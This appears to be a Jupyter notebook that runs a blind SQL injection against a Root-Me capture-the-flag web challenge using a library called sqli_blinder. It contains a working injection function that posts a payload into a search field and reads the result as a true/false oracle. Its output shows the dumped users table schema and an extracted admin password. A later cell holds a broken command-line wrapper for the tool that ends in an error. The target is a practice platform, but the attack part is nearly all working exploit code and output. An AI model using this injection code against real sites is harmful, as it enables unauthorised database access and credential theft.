In [2]:
import sqli_blinder
import requests

In [3]:
def example_func(sql):
    """this function must return True for sql=`1=1` and False for sql=`1=0`"""
    
    http_proxy   = "http://localhost:8080"
    proxyDict = { 
                 "https"   : http_proxy,    
                 "http"   : http_proxy
                }
    proxyDict = None

    burp0_url = "http://challenge01.root-me.org:80/web-serveur/ch19/?action=recherche"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://challenge01.root-me.org", "Connection": "close", "Referer": "http://challenge01.root-me.org/web-serveur/ch19/?action=recherche", "Upgrade-Insecure-Requests": "1"}
    burp0_data = {"recherche": "f' or (%s) -- " % sql}
    r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data,proxies=proxyDict)
    
    if r.status_code != 200:
        raise Exception('code: %d, ошибка sql: %s'%(r.status_code,sql))
    if "Unable to prepare statement" in r.text:
        raise Exception('code: %d, ошибка sql: %s'%(r.status_code,sql))
    if "News system" in r.text:
        return True
    else:
        return False

In [4]:
sqlib = sqli_blinder.SQLiBlinder(example_func,'sqlite')

In [6]:
sqlib.get_string('sqlite_master','sql',1)

length: 62


'CREATE TABLE users(username TEXT, password TEXT, Year INTEGER)'

In [7]:
sqlib.get(['username','password'],'users',where="username='admin'")

count 1
length: 5
length: 15
['admin', 'c4K04dtIaJsuWdi']


[['admin', 'c4K04dtIaJsuWdi']]

In [1]:
import argparse
parser = argparse.ArgumentParser()

## --check
## --count 
## --one '--table' '--'
## --get
parser.add_argument("mode",help="one of ['check','count','one','get']",choices= ['check','count','one','get'])
parser.add_argument("-t","--table",
                    help = "table nmae");
parser.add_argument("-c","--column",
                    help="column names. For get mode could by comma separated array of columns")
parser.add_argument("-w", "--where", 
                    help="where clause")
parser.add_argument("--threads",help="number of threads",type=int,)
parser.add_argument('--dbms',help="DBMS",choices= ['mysql','mssql','sqlite','oracle'],required=True)


args = parser.parse_args()
if args.threads <=0 :
    print ('threads > 0')
    exit(-1)
if args.threads == 1:
    multithreaded = False
else:
    multithreaded = True

sqlib = sqli_blinder.SQLiBliner(request_func,args.dbms,multithreaded=multithreaded,threads=args.threads)

if args.mode == 'check':
    check = sqlib.check()
    print (check)
    exit(0)

parser.parse_args('check')

usage: ipykernel_launcher.py [-h] [-t TABLE] [-c COLUMN] [-w WHERE]
                             [--threads THREADS] --dbms
                             {mysql,mssql,sqlite,oracle}
                             {check,count,one,get}
ipykernel_launcher.py: error: argument mode: invalid choice: '/Users/p.sorokin/Library/Jupyter/runtime/kernel-de751ca1-7c44-40a1-8bc3-f5cca5719359.json' (choose from 'check', 'count', 'one', 'get')


SystemExit: 2

/Users/p.sorokin/anaconda3/envs/cth_37/lib/python3.7/site-packages/IPython/core/interactiveshell.py:3334: UserWarning: To exit: use 'exit', 'quit', or Ctrl-D.
  warn("To exit: use 'exit', 'quit', or Ctrl-D.", stacklevel=1)
